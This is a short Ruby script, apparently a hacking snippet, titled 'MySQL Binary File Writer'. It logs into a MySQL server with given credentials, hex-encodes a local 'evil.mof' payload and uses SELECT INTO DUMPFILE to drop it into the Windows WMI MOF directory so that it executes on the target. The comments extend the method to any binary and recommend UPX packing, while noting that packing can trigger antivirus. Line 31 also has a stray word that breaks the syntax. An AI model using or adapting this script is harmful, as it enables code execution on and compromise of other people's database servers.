MySQL Binary File Writer

1. #!/usr/bin/env ruby
2. # Code Snippet by HR
3.  
4. # We need mysql gem for connection handling
5. require 'rubygems'
6. require 'mysql'
7.  
8. target='127.0.0.1' # Your Target IP running MySQL
9. user='username'    # MySQL User
10. pass='password'    # MySQL Password
11. file='/local/path/to/evil.mof' # Local Evil .MOF File to upload
12. target_path="c:\\\\windows\\\\system32\\\\wbem\\\\mof\\\\evil.mof" # Path on Target to MOF compiler
13.  
14. # Establish connection or fail
15. begin
16.   dbc = Mysql.connect(target, user, pass)
17. rescue Mysql::Error => e
18.   puts "Connection Problem!"
19.   puts "\t=> #{e}"
20.   exit 666;
21. end
22.  
23. # Take our local file, convert to hex and write to target filesystem
24. # This will work for any binary file, not just .MOF files....
25. # Try to keep your upload file size small or you will have to use more SQL magic to upload it in chunks to a temp db and table, then dump the table content to file but lets keep it simple....
26. data = "0x" + File.open(file, 'rb').read.unpack('H*').first
27. begin
28.   dbc.query("SELECT #{data} INTO DUMPFILE '#{target_path}'")
29.   puts "File uploaded successfully!"
30. rescue Mysql::Error => e
31.   puts "Problem writing payload to file!"white
32.   puts "\t=> #{e}"
33.   if e =~ /MySQL server has gone away/
34.     puts "This is likely due to payload which is too large in size....."
35.     puts "Try compressing with UPX to shrink size down: upx 9 -qq #{file}" # UPX can shrink your payload big time, but can cause some AV to freak out so be smart and use what works for you....
36.     puts "\t=> Then try again....."
37.   end
38. end
39. #EOF